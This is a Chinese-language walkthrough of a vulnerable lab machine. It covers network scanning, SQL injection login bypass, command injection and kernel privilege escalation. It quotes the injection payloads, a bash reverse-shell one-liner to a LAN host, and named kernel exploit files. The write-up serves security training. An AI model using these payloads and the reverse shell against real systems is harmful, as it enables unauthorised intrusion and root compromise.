简介
靶机较为简单,通过登录页SQL注入漏洞登录管理页面,然后利用命令注入漏洞获得Web Shell,最后利用内核漏洞提升至root权限。
信息收集
使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图:
然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.130快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,868和3306端口,分别运行着OpenSSH 3.9p1,Apache httpd 2.0.20,rpcbind,https,CUPS1.1,RPC和MySQL服务,操作系统可能为CentOS 2.6,如图:
使用SearchSploit搜索openssh 漏洞如图:
使用Google搜索631端口运行的服务CUPS/1.1漏洞,发现存在缓冲区溢出、本地权限提升和任意文件覆盖漏洞,使用SearchSploit查找漏洞利用程序,如图:
漏洞发现
使用dirbuster扫描80端口和631端口目录时未发现有用的信息,使用nikto扫描漏洞时也未发现存在SQL注入漏洞,虽然631端口允许PUT方法,但是由于目录没有权限,故无法上传文件。使用漏洞数据库中openssh的漏洞利用程序无法获得shell。然后访问80端口Web服务,发现是个简陋的登录页面,如图:
在源代码中发现网页提交登录信息到index.php,且有一句注释像是提示,如图:
SQL注入漏洞
使用单引号测试SQL注入发现页面没有任何变化,尝试使用用户名‘=’和密码‘=’登录成功,如图:
可见这里存在SQL注入,使用sqlmap测试时,在level=3,risk=2的条件下发现uname参数存在SQL注入漏洞,如图:
但是权限较低,无法通过SQL注入获取root用户密码和shell。
命令注入漏洞
在登录后的页面测试是否存在命令注入漏洞,使用127 & id测试,成功执行命令,如图:
漏洞利用
利用命令注入漏洞通过bash -i >& /dev/tcp/192.168.0.128/4444 0>&1反弹shell,如图:
权限提升
查看内核版本,发现是2.6.9-55,如图:
使用searchsploit查找centos 2.x的内核提权漏洞利用程序,如图:
将9545.c上传到目标主机,编译后执行,成功获得root权限,如图:
同样,将9542.c上传到目标主机,编译后执行,成功获得root权限,如图:
总结
该靶机没有花太多时间,在SQL注入以及尝试使用其他方法提权上花的时间比较多,但最终未找到除内核漏洞提权外的其它方法。
